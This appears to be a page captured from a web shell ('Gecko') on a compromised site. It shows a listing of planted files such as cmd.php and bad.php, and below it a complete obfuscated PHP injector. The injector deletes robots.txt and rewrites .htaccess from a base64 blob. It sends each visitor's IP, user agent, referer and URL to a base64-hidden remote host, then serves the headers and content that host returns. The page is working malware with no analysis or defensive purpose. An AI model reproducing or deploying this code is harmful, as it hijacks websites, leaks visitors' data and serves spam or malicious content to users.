Gecko [ maindisinibre4.click ]

Name	Size	Permission	Date
01sdfasdfe	[ DIR ]	drwxr-xr-x	2026-02-10 02:40
9c9886b8	[ DIR ]	drwxr-xr-x	2026-02-10 02:40
ytidghzsfg	[ DIR ]	drwxr-xr-x	2026-02-10 02:40
.htaccess	498 B	-rw-r--r--	2026-02-04 02:58
32next.php	1.01 KB	-rw-r--r--	2026-02-07 15:47
bad.php	623 B	-rw-r--r--	2026-02-07 15:46
class.php	1.19 KB	-rw-r--r--	2026-02-07 15:47
cmd.php	1.7 KB	-rw-r--r--	2026-02-07 15:46
diwa-777-download-app.html__73d52e3	13.5 KB	-rw-r--r--	2026-01-17 20:08
diwa-777.html__73d52e3	5.45 KB	-rw-r--r--	2026-01-15 16:45
error_log	352 B	-rw-r--r--	2026-01-21 05:47
error_log__73d52e3	163 B	-rw-r--r--	2026-01-12 20:22
extract.php	113 B	-rw-r--r--	2026-02-07 10:05
hfwpkkln.php__73d52e3	19.46 KB	-rw-r--r--	2026-01-14 10:09
index.html__73d52e3	99.34 KB	-rw-r--r--	2025-08-31 01:36
index.php__73d52e3	2.65 KB	-rw-r--r--	2026-01-21 03:47
inputs.php__73d52e3	127 B	-rw-r--r--	2026-01-14 09:19
itstzvud.php__73d52e3	14.76 KB	-rw-r--r--	2026-01-14 10:09
php.ini__73d52e3	40 B	-rw-r--r--	2026-01-21 03:47
sdfw.php__73d52e3	23.86 KB	-rw-r--r--	2026-01-19 18:55
txets.php__73d52e3	5.47 KB	-rw-r--r--	2026-01-10 08:03
wp-blog-header.php__73d52e3	1.78 KB	-rw-r--r--	2026-01-21 03:47
xor.php	1.03 KB	-rw-r--r--	2026-02-07 15:47

Rename

<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzEwNDEtY2g0LXY4MDUucmFrdXRlbjI1anAuY2xpY2s='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>